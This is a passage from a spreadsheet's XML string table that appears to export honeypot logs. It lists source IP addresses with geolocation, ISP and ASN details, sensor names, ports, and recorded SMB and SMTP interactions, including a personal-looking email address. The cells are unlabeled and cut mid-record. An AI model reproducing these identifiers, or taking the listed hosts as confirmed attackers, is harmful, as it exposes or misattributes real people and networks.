    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;40009&amp;&amp;23&amp;&amp;32772&amp;&amp;NA&amp;&amp;46408</t>
  </si>
  <si>
    <t>Kolkata (Balaka Natun Bazar)</t>
  </si>
  <si>
    <t>22.6412</t>
  </si>
  <si>
    <t>88.4075</t>
  </si>
  <si>
    <t>::ffff:a0ee:5fe5</t>
  </si>
  <si>
    <t>e793637a2db9f5e831ce6059b8cfe7f6</t>
  </si>
  <si>
    <t>138.204.69.248</t>
  </si>
  <si>
    <t>138-204-69-248.wantel.net.br&amp;&amp;NA</t>
  </si>
  <si>
    <t>Serrinha</t>
  </si>
  <si>
    <t>3447690</t>
  </si>
  <si>
    <t>-11.6642</t>
  </si>
  <si>
    <t>-39.0075</t>
  </si>
  <si>
    <t>263880</t>
  </si>
  <si>
    <t>WANTEL TECNOLOGIA LTDA. ­ EPP</t>
  </si>
  <si>
    <t>::ffff:8acc:45f8</t>
  </si>
  <si>
    <t>2b5135fbcd034ec264ebe022a40c2e97</t>
  </si>
  <si>
    <t>117.214.76.255</t>
  </si>
  <si>
    <t>::ffff:75d6:4cff</t>
  </si>
  <si>
    <t>af8bb167a702ae5353fd27322f3aa16d</t>
  </si>
  <si>
    <t>117.207.33.137</t>
  </si>
  <si>
    <t>::ffff:75cf:2189</t>
  </si>
  <si>
    <t>21b00c6fc92a8ef15208ae0eae03c9ba</t>
  </si>
  <si>
    <t>117.215.55.250</t>
  </si>
  <si>
    <t>::ffff:75d7:37fa</t>
  </si>
  <si>
    <t>5f75f30470d1f58c12a3a8c7c92d19a4</t>
  </si>
  <si>
    <t>60.49.64.97</t>
  </si>
  <si>
    <t>::ffff:3c31:4061</t>
  </si>
  <si>
    <t>0812a734367e1f353f9b052241aad166</t>
  </si>
  <si>
    <t>103.76.153.185</t>
  </si>
  <si>
    <t>150151</t>
  </si>
  <si>
    <t>EGI-AS-AP</t>
  </si>
  <si>
    <t>Evergreen Internet</t>
  </si>
  <si>
    <t>Internet Bangla Network</t>
  </si>
  <si>
    <t>::ffff:674c:99b9</t>
  </si>
  <si>
    <t>3384b99387ee6e738608378eb3e4c8bd</t>
  </si>
  <si>
    <t>103.93.106.134</t>
  </si>
  <si>
    <t>Tiruchirappalli</t>
  </si>
  <si>
    <t>Kāttupputtūr</t>
  </si>
  <si>
    <t>1267428</t>
  </si>
  <si>
    <t>10.9938</t>
  </si>
  <si>
    <t>78.2193</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.93.106.134,58370)}&amp;&amp;{Data_SMB:Incoming connection (103.93.106.134,59309)}</t>
  </si>
  <si>
    <t>::ffff:675d:6a86</t>
  </si>
  <si>
    <t>caf116b67c318e9bc53e6347f196a154</t>
  </si>
  <si>
    <t>117.195.165.102</t>
  </si>
  <si>
    <t>::ffff:75c3:a566</t>
  </si>
  <si>
    <t>d623bb2bfd1aa2a3ffc7e37f47967d89</t>
  </si>
  <si>
    <t>120.56.233.220</t>
  </si>
  <si>
    <t>Omalur</t>
  </si>
  <si>
    <t>1261049</t>
  </si>
  <si>
    <t>11.741</t>
  </si>
  <si>
    <t>78.0456</t>
  </si>
  <si>
    <t>::ffff:7838:e9dc</t>
  </si>
  <si>
    <t>4bf7255d38f0b35070c75f1fedccfadb</t>
  </si>
  <si>
    <t>117.205.152.243</t>
  </si>
  <si>
    <t>::ffff:75cd:98f3</t>
  </si>
  <si>
    <t>f524c4e84d8822b5b51b3ea930049a6d</t>
  </si>
  <si>
    <t>209.212.223.183</t>
  </si>
  <si>
    <t>MV</t>
  </si>
  <si>
    <t>Maldives</t>
  </si>
  <si>
    <t>Faafu Atholhu</t>
  </si>
  <si>
    <t>Nilandhoo</t>
  </si>
  <si>
    <t>12494177</t>
  </si>
  <si>
    <t>3.05667</t>
  </si>
  <si>
    <t>72.89</t>
  </si>
  <si>
    <t>7642</t>
  </si>
  <si>
    <t>DHIRAAGU-MV-AP</t>
  </si>
  <si>
    <t>Dhiraagu Pvt.Ltd</t>
  </si>
  <si>
    <t>Dhiraagu</t>
  </si>
  <si>
    <t>::ffff:d1d4:dfb7</t>
  </si>
  <si>
    <t>5ab1c875e0f8c6fd6db2ae38c91ca990</t>
  </si>
  <si>
    <t>176.91.216.74</t>
  </si>
  <si>
    <t>::ffff:b05b:d84a</t>
  </si>
  <si>
    <t>4b99a9757c5e682766a52c53ef24f43c</t>
  </si>
  <si>
    <t>203.204.234.159</t>
  </si>
  <si>
    <t>MULTIMEDIA-AS-AP</t>
  </si>
  <si>
    <t>::ffff:cbcc:ea9f</t>
  </si>
  <si>
    <t>68760ac0aa46db1652be234e0d341c78</t>
  </si>
  <si>
    <t>117.214.65.17</t>
  </si>
  <si>
    <t>::ffff:75d6:4111</t>
  </si>
  <si>
    <t>dbaeb3bbf1bcdf6cc7cd86fcc6c0c39e</t>
  </si>
  <si>
    <t>120.56.92.226</t>
  </si>
  <si>
    <t>::ffff:7838:5ce2</t>
  </si>
  <si>
    <t>39848e2b309f4689613295be31a6bd2a</t>
  </si>
  <si>
    <t>117.197.185.200</t>
  </si>
  <si>
    <t>::ffff:75c5:b9c8</t>
  </si>
  <si>
    <t>c40a47bc7fed8eb8b1e6b543cb58ca16</t>
  </si>
  <si>
    <t>14.136.181.155</t>
  </si>
  <si>
    <t>NA&amp;&amp;014136181155.ctinets.com</t>
  </si>
  <si>
    <t>::ffff:e88:b59b</t>
  </si>
  <si>
    <t>d34952748eeafcc8cd53893b3b7efe20</t>
  </si>
  <si>
    <t>45.125.66.25</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H26&amp;&amp;SMA-LAB_DNS_H34&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_SMTP_H4&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H30&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SMTP_H7&amp;&amp;SMA-LAB_SMTP_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;53&amp;&amp;38348&amp;&amp;43298&amp;&amp;54376&amp;&amp;40330&amp;&amp;35917&amp;&amp;24244&amp;&amp;33971&amp;&amp;25242&amp;&amp;10076&amp;&amp;64376&amp;&amp;23948&amp;&amp;11572&amp;&amp;NA</t>
  </si>
  <si>
    <t>09311</t>
  </si>
  <si>
    <t>54.6916</t>
  </si>
  <si>
    <t>25.2874</t>
  </si>
  <si>
    <t>133398</t>
  </si>
  <si>
    <t>Tele Asia Limited</t>
  </si>
  <si>
    <t>HostBaltic</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;michaelchika1@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}</t>
  </si>
  <si>
    <t>::ffff:2d7d:4219</t>
  </si>
  <si>
    <t>96c613dac7e8eae5c14f393cd69f9f71</t>
  </si>
  <si>
    <t>103.103.56.121</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;445&amp;&amp;17124&amp;&amp;43307&amp;&amp;1433</t>
  </si>
  <si>
    <t>New Delhi (Malviya Nagar)</t>
  </si>
  <si>
    <t>110017</t>
  </si>
  <si>
    <t>28.531</t>
  </si>
  <si>
    <t>77.2141</t>
  </si>
  <si>
    <t>136696</t>
  </si>
  <si>
    <t>Arktel Networks Pvt. Ltd</t>
  </si>
  <si>
    <t>Sifi Online Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:6767:3879</t>
  </si>
  <si>
    <t>2c409a52e18300117ef94e4f931385b6</t>
  </si>
  <si>
    <t>41.59.29.35</t>
  </si>
  <si>
    <t>TZ</t>
  </si>
  <si>
    <t>Tanzania</t>
  </si>
  <si>
    <t>Dar es Salaam Region</t>
  </si>
  <si>
    <t>Ilala District</t>
  </si>
  <si>
    <t>Dar es Salaam</t>
  </si>
  <si>
    <t>160263</t>
  </si>
  <si>
    <t>-6.8185</t>
  </si>
  <si>
    <t>39.2863</t>
  </si>
  <si>
    <t>33765</t>
  </si>
  <si>
    <t>TANZANIA TELECOMMUNICATIONS CO. LTD</t>
  </si>
  <si>
    <t>TTCL</t>
  </si>
  <si>
    <t>2010-04-13</t>
  </si>
  <si>
    <t>::ffff:293b:1d23</t>
  </si>
  <si>
    <t>2143ca1658dae8aff7fa30435c236648</t>
  </si>
  <si>
    <t>59.94.56.47</t>
  </si>
  <si>
    <t>::ffff:3b5e:382f</t>
  </si>
  <si>
    <t>ad860dee3f0c79459941eefe272de32d</t>
  </si>
  <si>
    <t>117.199.192.27</t>
  </si>
  <si>
    <t>::ffff:75c7:c01b</t>
  </si>
  <si>
    <t>34d6ccff531631d9ca494bfb98f8d712</t>
  </si>
  <si>
    <t>41.59.145.72</t>
  </si>
  <si>
    <t>-6.81899</t>
  </si>
  <si>
    <t>39.2867</t>
  </si>
  <si>
    <t>TTCLDATA</t>
  </si>
  <si>
    <t>Tanzania Telecommunications CO. LTD</t>
  </si>
  <si>
    <t>Ttcl</t>
  </si>
  <si>
    <t>::ffff:293b:9148</t>
  </si>
  <si>
    <t>796ec5bc61e5f9632f94d42fe07048dd</t>
  </si>
  <si>
    <t>117.206.28.146</t>
  </si>
  <si>
    <t>::ffff:75ce:1c92</t>
  </si>
  <si>
    <t>966573a3602c8b20a0c16e9be6af1c57</t>
  </si>
  <si>
    <t>60.48.26.195</t>
  </si>
  <si>
    <t>::ffff:3c30:1ac3</t>
  </si>
  <si>
    <t>e2f9322873c0849a784e9aa3ea19f875</t>
  </si>
  <si>
    <t>117.216.17.49</t>
  </si>
  <si>
    <t>::ffff:75d8:1131</t>
  </si>
  <si>
    <t>52fe81afc58ac6198cf24f5ee4d7a51e</t>
  </si>
  <si>
    <t>197.234.121.192</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H2</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;22</t>
  </si>
  <si>
    <t>Namibia</t>
  </si>
  <si>
    <t>Khomas Region</t>
  </si>
  <si>
    <t>Windhoek (Prosperita Industrial)</t>
  </si>
  <si>
    <t>3352136</t>
  </si>
  <si>
    <t>-22.6208</t>
  </si>
  <si>
    <t>17.0804</t>
  </si>
  <si>
    <t>33763</t>
  </si>
  <si>
    <t>Paratus Telecommunications Limited</t>
  </si>
  <si>
    <t>Paratus Regional - Angola</t>
  </si>
  <si>
    <t>Internet Technologies Namibia</t>
  </si>
  <si>
    <t>2013-06-11</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (197.234.121.192,58689)}&amp;&amp;{Data_SMB:Incoming connection (197.234.121.192,59374)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:c5ea:79c0</t>
  </si>
  <si>
    <t>7e47226f97e534663ce8742281da4afd</t>
  </si>
  <si>
    <t>59.92.196.56</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H22</t>
  </si>
  <si>
    <t>23&amp;&amp;445</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (59.92.196.56,53721)}</t>
  </si>
  <si>
    <t>::ffff:3b5c:c438</t>
  </si>
  <si>
    <t>1ce5a0fcd6b3fdd11bf441c7fcd74df2</t>
  </si>
  <si>
    <t>59.99.98.46</t>
  </si>
  <si>
    <t>::ffff:3b63:622e</t>
  </si>
  <si>
    <t>5b1ca8bafd2648950760ee10f6be40ea</t>
  </si>
  <si>
    <t>117.205.87.16</t>
  </si>
  <si>
    <t>Ghaziabad</t>
  </si>
  <si>
    <t>1271308</t>
  </si>
  <si>
    <t>201009</t>
  </si>
  <si>
    <t>28.6692</t>
  </si>
  <si>
    <t>77.4538</t>
  </si>
  <si>
    <t>::ffff:75cd:5710</t>
  </si>
  <si>
    <t>a9e67921f33c432d68b8cdc914c12d51</t>
  </si>
  <si>
    <t>99.254.42.30</t>
  </si>
  <si>
    <t>NA&amp;&amp;pool-99-254-42-30.cpe.net.cable.rogers.com</t>
  </si>
  <si>
    <t>York</t>
  </si>
  <si>
    <t>Newmarket</t>
  </si>
  <si>
    <t>6087701</t>
  </si>
  <si>
    <t>L3Y</t>
  </si>
  <si>
    <t>44.0592</t>
  </si>
  <si>
    <t>-79.4613</t>
  </si>
  <si>
    <t>812</t>
  </si>
  <si>
    <t>Rogers Cable Inc. ETOB</t>
  </si>
  <si>
    <t>::ffff:63fe:2a1e</t>
  </si>
  <si>
    <t>4b182f70824ec3cdbf94720a39901a52</t>
  </si>
  <si>
    <t>1.32.42.54</t>
  </si>
  <si>
    <t>3.11613</t>
  </si>
  <si>
    <t>101.666</t>
  </si>
  <si>
    <t>Unifi BIZ</t>
  </si>
  <si>
    <t>2011-04-05</t>
  </si>
  <si>
    <t>UNIFI-BIZ</t>
  </si>
  <si>
    <t>::ffff:120:2a36</t>
  </si>
  <si>
    <t>1f7fa1c433ee7d4338da302145de469b</t>
  </si>
  <si>
    <t>149.255.246.158</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H23&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;57323&amp;&amp;1433&amp;&amp;445&amp;&amp;3306</t>
  </si>
  <si>
    <t>IQ</t>
  </si>
  <si>
    <t>Iraq</t>
  </si>
  <si>
    <t>Basra</t>
  </si>
  <si>
    <t>Al-Midaina District</t>
  </si>
  <si>
    <t>Al Madīnah</t>
  </si>
  <si>
    <t>99106</t>
  </si>
  <si>
    <t>30.9632</t>
  </si>
  <si>
    <t>47.27</t>
  </si>
  <si>
    <t>203214</t>
  </si>
  <si>
    <t>Hulum Almustakbal Company for Communication Engineering and Services Ltd</t>
  </si>
  <si>
    <t>Broadbandsubscriberpool</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,61616)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,62315)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,56528)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,61919)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,50332)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,50854)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,60244)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,61658)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,65183)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,49395)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,49217)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,49782)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,65027)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,50107)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,60282)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,51523)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,62100)}&amp;&amp;{Data_SMB:Incoming connection (149.255.246.158,50706)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:95ff:f69e</t>
  </si>
  <si>
    <t>f04af9a6886aa1333e9c340a85b06cd4</t>
  </si>
  <si>
    <t>117.206.95.62</t>
  </si>
  <si>
    <t>::ffff:75ce:5f3e</t>
  </si>
  <si>
    <t>2c4951700d5ec68aa14097b206d80bd7</t>
  </si>
  <si>
    <t>86.57.156.54</t>
  </si>
  <si>
    <t>Belarus</t>
  </si>
  <si>
    <t>HM</t>
  </si>
  <si>
    <t>Minsk City</t>
  </si>
  <si>
    <t>Minsk</t>
  </si>
  <si>
    <t>625144</t>
  </si>
  <si>
    <t>220002</t>
  </si>
  <si>
    <t>53.9045</t>
  </si>
  <si>
    <t>27.5615</t>
  </si>
  <si>
    <t>6697</t>
  </si>
  <si>
    <t>BELPAK-AS</t>
  </si>
  <si>
    <t>Republican Unitary Telecommunication Enterprise Beltelecom</t>
  </si>
  <si>
    <t>Magnezit Minsk</t>
  </si>
  <si>
    <t>::ffff:5639:9c36</t>
  </si>
  <si>
    <t>098ae296ea800c8ecb73acfea9c78f8d</t>
  </si>
  <si>
    <t>59.180.180.179</t>
  </si>
  <si>
    <t>::ffff:3bb4:b4b3</t>
  </si>
  <si>
    <t>8e4f6da981b9922edac58649412091da</t>
  </si>
  <si>
    <t>120.61.164.222</t>
  </si>
  <si>
    <t>::ffff:783d:a4de</t>
  </si>
  <si>
    <t>e909d0aeb1e47e9267d01dc629812193</t>
  </si>
  <si>
    <t>117.193.102.255</t>
  </si>
  <si>
    <t>::ffff:75c1:66ff</t>
  </si>
  <si>
    <t>2b3aa1ca4b11109d27afc64e71ac1215</t>
  </si>
  <si>
    <t>165.120.245.118</t>
  </si>
  <si>
    <t>host165-120-245-118.range165-120.btcentralplus.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>INFONET Services Corporation</t>
  </si>
  <si>
    <t>::ffff:a578:f576</t>
  </si>
  <si>
    <t>9da7e2506b80cf239daf3feab6d94df1</t>
  </si>
  <si>
    <t>59.16.153.239</t>
  </si>
  <si>
    <t>::ffff:3b10:99ef</t>
  </si>
  <si>
    <t>749d95d8c1d3217ebce44c07c60966d1</t>
  </si>
  <si>
    <t>59.180.169.128</t>
  </si>
  <si>
    <t>::ffff:3bb4:a980</t>
  </si>
  <si>
    <t>0fceec2bb315bede1ccf0ca98fb0e941</t>
  </si>
  <si>
    <t>117.192.73.229</t>
  </si>
  <si>
    <t>::ffff:75c0:49e5</t>
  </si>
  <si>
    <t>501041f1900b1c288a27b1a84cc43f2b</t>
  </si>
  <si>
    <t>70.90.217.94</t>
  </si>
  <si>
    <t>Allegheny</t>
  </si>
  <si>
    <t>Bethel Park</t>
  </si>
  <si>
    <t>5180199</t>
  </si>
  <si>
    <t>15102</t>
  </si>
  <si>
    <t>40.3276</t>
  </si>
  <si>
    <t>-80.0395</t>
  </si>
  <si>
    <t>2004-08-09</t>
  </si>
  <si>
    <t>CBC-CM-3</t>
  </si>
  <si>
    <t>2021-01-25</t>
  </si>
  <si>
    <t>::ffff:465a:d95e</t>
  </si>
  <si>
    <t>913ae68018736cc6833faadbe9918529</t>
  </si>
  <si>
    <t>101.108.79.8</t>
  </si>
  <si>
    <t>Phasi Charoen</t>
  </si>
  <si>
    <t>1607782</t>
  </si>
  <si>
    <t>10160</t>
  </si>
  <si>
    <t>13.7147</t>
  </si>
  <si>
    <t>100.437</t>
  </si>
  <si>
    <t>::ffff:656c:4f08</t>
  </si>
  <si>
    <t>eac85ec78735733724ac4279fb4cc3c8</t>
  </si>
  <si>
    <t>117.235.145.96</t>
  </si>
  <si>
    <t>::ffff:75eb:9160</t>
  </si>
  <si>
    <t>79795ce6095a7ba0b2d59ca65c85a832</t>
  </si>
  <si>
    <t>120.56.11.89</t>
  </si>
  <si>
    <t>::ffff:7838:b59</t>
  </si>
  <si>
    <t>9eb6bc9716be24a7d5c63d79cc11ca37</t>
  </si>
  <si>
    <t>117.217.68.90</t>
  </si>
  <si>
    <t>::ffff:75d9:445a</t>
  </si>
  <si>
    <t>5da91c28d8583c339e222dd28cec51d0</t>
  </si>
  <si>
    <t>148.69.88.38</t>
  </si>
  <si>
    <t>PT</t>
  </si>
  <si>
    <t>Portugal</t>
  </si>
  <si>
    <t>Lisbon</t>
  </si>
  <si>
    <t>2267057</t>
  </si>
  <si>
    <t>38.7223</t>
  </si>
  <si>
    <t>-9.13934</t>
  </si>
  <si>
    <t>12353</t>
  </si>
  <si>
    <t>VODAFONE-PT</t>
  </si>
  <si>
    <t>Vodafone Portugal - Communicacoes Pessoais S.A.</t>
  </si>
  <si>
    <t>Ptvdfcustedes220</t>
  </si>
  <si>
    <t>::ffff:9445:5826</t>
  </si>
  <si>
    <t>0153ec7b5fb4fbc4570d59d648071c07</t>
  </si>
  <si>
    <t>42.82.241.153</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}</t>
  </si>
  <si>
    <t>CJCKN-AS-KR</t>
  </si>
  <si>
    <t>::ffff:2a52:f199</t>
  </si>
  <si>
    <t>72ab395d0764af75dd0c43d9570872e2</t>
  </si>
  <si>
    <t>14.236.1.159</t>
  </si>
  <si>
    <t>::ffff:eec:19f</t>
  </si>
  <si>
    <t>8a718093bcfa08367ca252e525ae1880</t>
  </si>
  <si>
    <t>59.94.48.195</t>
  </si>
  <si>
    <t>::ffff:3b5e:30c3</t>
  </si>
  <si>
    <t>a68ef0a36843d24e7a94d6f1995f3b5b</t>
  </si>
  <si>
    <t>117.196.144.75</t>
  </si>
  <si>
    <t>::ffff:75c4:904b</t>
  </si>
  <si>
    <t>90a89f3b7cbfcaaa08318c4d87015fc9</t>
  </si>
  <si>
    <t>120.61.181.22</t>
  </si>
  <si>
    <t>::ffff:783d:b516</t>
  </si>
  <si>
    <t>0325aed37f700006498635480db7df7d</t>
  </si>
  <si>
    <t>182.152.16.102</t>
  </si>
  <si>
    <t>::ffff:b698:1066</t>
  </si>
  <si>
    <t>09a12c3f72ee02d8dad3bbf0ede1625b</t>
  </si>
  <si>
    <t>202.179.73.75</t>
  </si>
  <si>
    <t>Mumbai (Navpada)</t>
  </si>
  <si>
    <t>19.1048</t>
  </si>
  <si>
    <t>72.8486</t>
  </si>
  <si>
    <t>::ffff:cab3:494b</t>
  </si>
  <si>
    <t>bde80ef353cb5cd7a6ed3639aa7a40dc</t>
  </si>
  <si>
    <t>182.56.193.233</t>
  </si>
  <si>
    <t>::ffff:b638:c1e9</t>
  </si>
  <si>
    <t>2671f979c34dcc8945db1c6471be5458</t>
  </si>
  <si>
    <t>189.127.151.149</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;27382&amp;&amp;NA</t>
  </si>
  <si>
    <t>Rondônia</t>
  </si>
  <si>
    <t>Porto Velho</t>
  </si>
  <si>
    <t>3662762</t>
  </si>
  <si>
    <t>-8.76356</t>
  </si>
  <si>
    <t>-63.8972</t>
  </si>
  <si>
    <t>270705</t>
  </si>
  <si>
    <t>WILLAMES FERREIRA SANTOS - ME</t>
  </si>
  <si>
    <t>W F SANTOS LTDA</t>
  </si>
  <si>
    <t>OSN de GREGORI TELECOM</t>
  </si>
  <si>
    <t>::ffff:bd7f:9795</t>
  </si>
  <si>
    <t>e67ef838398acccf94bf13de34213e7b</t>
  </si>
  <si>
    <t>176.8.55.140</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;43040&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b008:378c</t>
  </si>
  <si>
    <t>83d7ed08f061c9fc3cbe7e212076ff12</t>
  </si>
  <si>
    <t>117.199.18.238</t>
  </si>
  <si>
    <t>::ffff:75c7:12ee</t>
  </si>
  <si>
    <t>ab4d1ae99c603012a3d3426864000c2c</t>
  </si>
  <si>
    <t>117.247.26.110</t>
  </si>
  <si>
    <t>::ffff:75f7:1a6e</t>
  </si>
  <si>
    <t>47685d4ce9ef930bcb640ed348c1a18c</t>
  </si>
  <si>
    <t>59.180.177.27</t>
  </si>
  <si>
    <t>::ffff:3bb4:b11b</t>
  </si>
  <si>
    <t>97a7943cf1b8b70cdd832297d45e692c</t>
  </si>
  <si>
    <t>117.223.93.43</t>
  </si>
  <si>
    <t>::ffff:75df:5d2b</t>
  </si>
  <si>
    <t>614f69f898998b587afe0f8ca2a990cd</t>
  </si>
  <si>
    <t>117.195.197.163</t>
  </si>
  <si>
    <t>::ffff:75c3:c5a3</t>
  </si>
  <si>
    <t>4df97cfff748ddd7ecd442f978b62fc1</t>
  </si>
  <si>
    <t>59.88.173.90</t>
  </si>
  <si>
    <t>::ffff:3b58:ad5a</t>
  </si>
  <si>
    <t>580a9761b2b2b540593c7de93dfbaf95</t>
  </si>
  <si>
    <t>209.38.22.58</t>
  </si>
  <si>
    <t>::ffff:d126:163a</t>
  </si>
  <si>
    <t>a8094c2de94250695879f4e5bf77556c</t>
  </si>
  <si>
    <t>48.217.232.87</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_HC1&amp;&amp;abuseipdb</t>
  </si>
  <si>
    <t>389&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_LDAP:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:30d9:e857</t>
  </si>
  <si>
    <t>b1f1ffc7cb4c73ea3e21316a9f234a40</t>
  </si>
  <si>
    <t>117.231.128.179</t>
  </si>
  <si>
    <t>::ffff:75e7:80b3</t>
  </si>
  <si>
    <t>5f2165dd3844da23f45c362eea5b4d87</t>
  </si>
  <si>
    <t>117.243.92.211</t>
  </si>
  <si>
    <t>::ffff:75f3:5cd3</t>
  </si>
  <si>
    <t>f4d59e31fcfdb22c731c747fb16144a3</t>
  </si>
  <si>
    <t>61.246.107.242</t>
  </si>
  <si>
    <t>Torrent Pharmaceuticals Ltd.</t>
  </si>
  <si>
    <t>2004-05-17</t>
  </si>
  <si>
    <t>TORR-4303178-NA</t>
  </si>
  <si>
    <t>::ffff:3df6:6bf2</t>
  </si>
  <si>
    <t>b8baf61e9c698d6a5751d550fdfc4750</t>
  </si>
  <si>
    <t>117.193.60.99</t>
  </si>
  <si>
    <t>::ffff:75c1:3c63</t>
  </si>
  <si>
    <t>a803910ad7a63ca633e7e2486c4ca3a0</t>
  </si>
  <si>
    <t>117.202.133.174</t>
  </si>
  <si>
    <t>::ffff:75ca:85ae</t>
  </si>
  <si>
    <t>360c2142bb7ca225f8892ca8b1e557bd</t>
  </si>
  <si>
    <t>223.226.126.33</t>
  </si>
  <si>
